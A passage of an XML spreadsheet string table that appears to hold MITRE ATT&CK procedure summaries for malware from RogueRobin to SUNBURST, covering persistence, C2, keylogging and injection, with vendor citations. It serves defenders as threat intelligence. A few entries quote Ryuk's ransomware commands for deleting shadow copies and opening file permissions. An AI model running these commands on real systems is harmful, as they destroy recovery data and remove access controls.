    <t>[RogueRobin](https://attack.mitre.org/software/S0270) establishes persistence by creating a shortcut (.LNK file) in the Windows startup folder to run a script each time the user logs in.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) base64 encodes strings that are sent to the C2 over its DNS tunnel.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) uses WMI to check BIOS version for VBOX, bochs, qemu, virtualbox, and vm to check for evidence that the script might be executing within an analysis environment. (Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) gathers BIOS versions and manufacturers, the number of CPU cores, the total physical memory, and the computer name.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) gathers the IP address and domain from the victim’s machine.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) collects the victim’s username and whether that user is an admin.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) uses Windows Script Components.(Citation: Unit42 DarkHydrus Jan 2019)(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) uses various WMI queries to check if the sample is running in a sandbox.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) automatically collects files from the local system and removable drives based on a predefined list of file extensions on a regular timeframe.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes. [Rover](https://attack.mitre.org/software/S0090) also automatically sends keylogger files and screenshots to the C2 server on a regular timeframe.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) searches for files on local drives based on a predefined list of file extensions.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) searches for files on attached removable drives based on a predefined list of file extensions every five seconds.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) automatically searches for files on local drives based on a predefined list of file extensions.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) has keylogging functionality.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) copies files from removable drives to &lt;code&gt;C:\system&lt;/code&gt;.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) has functionality to remove Registry Run key persistence as a cleanup procedure.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) persists by creating a Registry entry in &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt;.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) takes screenshots of the compromised system's desktop and saves them to &lt;code&gt;C:\system\screenshot.bmp&lt;/code&gt; for exfiltration every 60 minutes.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Ruler](https://attack.mitre.org/software/S0358) can be used to enumerate Exchange users and dump the GAL.(Citation: SensePost Ruler GitHub)</t>
  </si>
  <si>
    <t>Outlook Forms</t>
  </si>
  <si>
    <t>[Ruler](https://attack.mitre.org/software/S0358) can be used to automate the abuse of Outlook Forms to establish persistence.(Citation: SensePost Ruler GitHub)</t>
  </si>
  <si>
    <t>Outlook Home Page</t>
  </si>
  <si>
    <t xml:space="preserve">[Ruler](https://attack.mitre.org/software/S0358) can be used to automate the abuse of Outlook Home Pages to establish persistence.(Citation: SensePost Ruler GitHub) </t>
  </si>
  <si>
    <t>Outlook Rules</t>
  </si>
  <si>
    <t xml:space="preserve">[Ruler](https://attack.mitre.org/software/S0358) can be used to automate the abuse of Outlook Rules to establish persistence.(Citation: SensePost Ruler GitHub) </t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) contains code to compress files.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) contains code to clear event logs.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) contains code to open and copy data from the clipboard.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) kills antimalware running process.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) contains code to delete files from the victim’s machine.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) captures keystrokes and sends them back to the C2 server.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) adds itself to the Registry key &lt;code&gt;Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; to establish persistence upon reboot.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) gathers the OS version, logical drives information, processor information, and volume information.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) uses a batch file to kill a security program task and then attempts to remove itself.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has attempted to adjust its token privileges to have the &lt;code&gt;SeDebugPrivilege&lt;/code&gt;.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used a combination of symmetric (AES) and asymmetric (RSA) encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of .RYK. Encrypted directories have had a ransom note of RyukReadMe.txt written to the directory.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has stopped services related to anti-virus.(Citation: FireEye Ryuk and Trickbot January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) can use stolen domain admin accounts to move laterally within a victim domain.(Citation: ANSSI RYUK RANSOMWARE)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has called &lt;code&gt;GetLogicalDrives&lt;/code&gt; to emumerate all mounted drives, and &lt;code&gt;GetDriveTypeW&lt;/code&gt; to determine the drive type.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used &lt;code&gt;vssadmin Delete Shadows /all /quiet&lt;/code&gt; to to delete volume shadow copies and &lt;code&gt;vssadmin resize shadowstorage&lt;/code&gt; to force deletion of shadow copies created by third-party applications.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) can create .dll files that actually contain a Rich Text File format document.(Citation: ANSSI RYUK RANSOMWARE)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has constructed legitimate appearing installation folder paths by calling &lt;code&gt;GetWindowsDirectoryW&lt;/code&gt; and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as &lt;code&gt;C:\Users\Public&lt;/code&gt;.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used multiple native APIs including &lt;code&gt;ShellExecuteW&lt;/code&gt; to run executables,&lt;code&gt;GetWindowsDirectoryW&lt;/code&gt; to create folders, and &lt;code&gt;VirtualAlloc&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, and &lt;code&gt;CreateRemoteThread&lt;/code&gt; for process injection.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has called &lt;code&gt;CreateToolhelp32Snapshot&lt;/code&gt; to enumerate all running processes.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has injected itself into remote processes to encrypt files using a combination of &lt;code&gt;VirtualAlloc&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, and &lt;code&gt;CreateRemoteThread&lt;/code&gt;.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used the Windows command line to create a Registry entry under &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; to establish persistence.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used the C$ network share for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) can remotely create a scheduled task to execute itself on a system.(Citation: ANSSI RYUK RANSOMWARE)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has called &lt;code&gt;kill.bat&lt;/code&gt; for stopping services, disabling services and killing processes.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ryuk](https://attack.mitre.org/software/S0446) has called &lt;code&gt;GetIpNetTable&lt;/code&gt; in attempt to identify all mounted drives and hosts that have Address Resolution Protocol (ARP) entries.(Citation: CrowdStrike Ryuk January 2019)(Citation: Bleeping Computer - Ryuk WoL) </t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used Wake-on-Lan to power on turned off systems for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used &lt;code&gt;cmd.exe&lt;/code&gt; to create a Registry entry to establish persistence.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) can launch &lt;code&gt;icacls &lt;path&gt; /grant Everyone:F /T /C /Q&lt;/code&gt; to delete every access-based restrictions on files and directories.(Citation: ANSSI RYUK RANSOMWARE)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) primarily uses port 80 for C2, but falls back to ports 443 or 8080 if initial communication fails.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) may create a temporary user on the system named “Lost_{Unique Identifier}” with the password “pond~!@6”{Unique Identifier}.”(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) runs the command &lt;code&gt;net user&lt;/code&gt; on a victim. [S-Type](https://attack.mitre.org/software/S0085) also runs tests to determine the privilege level of the compromised user.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) may save itself as a file named msdtc.exe, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.(Citation: Cylance Dust Storm)(Citation: Microsoft DTC)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) may create a .lnk file to itself that is saved in the Start menu folder. It may also create the Registry key &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ IMJPMIJ8.1{3 characters of Unique Identifier}&lt;/code&gt;.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) may create the file &lt;code&gt;%HOMEPATH%\Start Menu\Programs\Startup\Realtek {Unique Identifier}.lnk&lt;/code&gt;, which points to the malicious msdtc.exe file already created in the %CommonFiles% directory.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) uses Base64 encoding for C2 traffic.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>The initial beacon packet for [S-Type](https://attack.mitre.org/software/S0085) contains the operating system version and file system of the victim.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) runs the command &lt;code&gt;net start&lt;/code&gt; on a victim.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) uses HTTP for C2.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use application shimming for persistence if it detects it is running as admin on Windows XP or 7, by creating a shim database to patch services.exe.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to access the file system on a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to decrypt and decompress its payload to enable code execution.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to inject a downloaded DLL into a newly created rundll32.exe process.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to delete files from a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to get directory listings or drive information on a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>Image File Execution Options Injection</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use image file execution options for persistence if it detects it is running with admin privileges on a Windows version newer than Windows 7.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to clean up and remove data structures from a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to download a DLL from C2 to a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to communicate with C2 with TCP over port 443.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to XOR the strings for its installer component with a hardcoded 128 byte key.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use port forwarding to establish a proxy between a target host and C2.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to add a value to the Registry Run key to establish persistence if it detects it is running with regular user privilege. (Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use RDP to connect to victim's machines.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has used a packed installer file.(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to identify the OS version, country code, and computer name.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to determine the domain name and whether a proxy is configured on a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to identify the user on a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to record video on a compromised host.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use the command shell to execute commands on a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[SDelete](https://attack.mitre.org/software/S0195) deletes data in a way that makes it unrecoverable.(Citation: Microsoft SDelete July 2016)</t>
  </si>
  <si>
    <t>[SEASHARPEE](https://attack.mitre.org/software/S0185) can download remote files onto victims.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[SEASHARPEE](https://attack.mitre.org/software/S0185) can timestomp files on victims using a Web shell.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[SEASHARPEE](https://attack.mitre.org/software/S0185) is a Web shell.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[SEASHARPEE](https://attack.mitre.org/software/S0185) can execute commands on victims.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to upload and download files.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has used base64 encoding and XOR to obfuscate PowerShell scripts.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to employ a custom PowerShell script.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the IP address, machine name, and OS of the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the domain of the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the username on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the current date and time on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[SHIPSHAPE](https://attack.mitre.org/software/S0028) achieves persistence by creating a shortcut in the Startup folder.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[APT30](https://attack.mitre.org/groups/G0013) may have used the [SHIPSHAPE](https://attack.mitre.org/software/S0028) malware to move onto air-gapped networks. [SHIPSHAPE](https://attack.mitre.org/software/S0028) targets removable drives to spread to other systems by modifying the drive to use Autorun to execute or by hiding legitimate document files and copying an executable to the folder with the same name as the legitimate document.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) has a command to obtain a directory listing.(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) has a command to retrieve information about connected users.(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) is obscured using XOR encoding and appended to a valid GIF file.(Citation: FireEye Clandestine Wolf)(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) has a command to obtain a process listing.(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) has a command to list all servers in the domain, as well as one to locate domain controllers on a domain.(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) uses [netstat](https://attack.mitre.org/software/S0104) to list TCP connection status.(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>[SHUTTERSPEED](https://attack.mitre.org/software/S0217) can download and execute an arbitary executable.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[SHUTTERSPEED](https://attack.mitre.org/software/S0217) can capture screenshots.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[SHUTTERSPEED](https://attack.mitre.org/software/S0217) can collect system information.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has hashed a string containing system information prior to exfiltration via POST requests.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has uploaded files and information from victim machines.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has sent system information to a C2 server via HTTP and HTTPS POST requests.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has deleted itself and the 'index.dat' file on a compromised machine to remove recent Internet history from the system.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) can enumerate files and directories.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has been created with a hidden attribute to insure it's not visible to the victim.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has downloaded files onto a victim machine.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has a keylogging capability.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has named a service it establishes on victim machines as "TaskFrame" to hide its malicious purpose.(Citation: CISA MAR SLOTHFULMEDIA October 2020) </t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has mimicked the names of known executables, such as mediaplayer.exe.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) can add, modify, and/or delete registry keys. It has changed the proxy configuration of a victim system by modifying the &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap&lt;/code&gt; registry.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has enumerated processes by ID, name, or privileges.(Citation: CISA MAR SLOTHFULMEDIA October 2020) </t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) can inject into running processes on a compromised host.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has taken a screenshot of a victim's desktop, named it "Filter3.jpg", and stored it in the local directory.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has the capability to start services.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has the capability to stop processes and services.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has collected system name, OS version, adapter information, memory usage, and disk information from a victim machine.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) can enumerate open ports on a victim machine.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has collected the username from a victim machine.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has the capability to enumerate services.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has used HTTP and HTTPS for C2 communications.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) can open a command line to execute commands.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has created a service on victim machines named "TaskFrame" to establish persistence.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOWDRIFT](https://attack.mitre.org/software/S0218) uses cloud based services for C2.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[SLOWDRIFT](https://attack.mitre.org/software/S0218) downloads additional payloads.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[SLOWDRIFT](https://attack.mitre.org/software/S0218) collects and sends system information to its C2.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[SNUGRIDE](https://attack.mitre.org/software/S0159) establishes persistence through a Registry Run key.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[SNUGRIDE](https://attack.mitre.org/software/S0159) encrypts C2 traffic using AES with a static key.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[SNUGRIDE](https://attack.mitre.org/software/S0159) communicates with its C2 server over HTTP.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[SNUGRIDE](https://attack.mitre.org/software/S0159) is capable of executing commands and spawning a reverse shell.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) is capable of enumerating application windows.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) communicates via DNS for C2.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) is capable of enumerating and manipulating files and directories.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) is capable of modifying the Registry.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) is capable of gathering system information.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>Data [SPACESHIP](https://attack.mitre.org/software/S0035) copies to the staging area is compressed with zlib. Bytes are rotated by four positions and XOR'ed with 0x23.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[SPACESHIP](https://attack.mitre.org/software/S0035) copies staged data to removable drives when they are inserted into the system.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[SPACESHIP](https://attack.mitre.org/software/S0035) identifies files and directories for collection by searching for specific file extensions or file modification time.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[SPACESHIP](https://attack.mitre.org/software/S0035) identifies files with certain extensions and copies them to a directory in the user's profile.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[SPACESHIP](https://attack.mitre.org/software/S0035) achieves persistence by creating a shortcut in the current user's Startup folder.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) has scripts that are responsible for deobfuscating additional scripts.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) has used been observed deleting scripts once used.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) can make a direct SQL connection to a Microsoft database controlled by the attackers, retrieve an item from the bindata table, then write and execute the file on disk.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) relies on users clicking on an embedded image to execute the scripts.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) has used a character insertion obfuscation technique, making the script appear to contain Chinese characters.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) has used PowerShell to create a Meterpreter session.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) has created scheduled tasks in &lt;code&gt;%appdata%\Roaming\Microsoft\Templates\&lt;/code&gt;.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) has used SQL to execute JavaScript and VB scripts on the host system.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) was digitally signed by SolarWinds from March - May 2020.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) used DNS for C2 traffic designed to mimic normal SolarWinds API communications.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
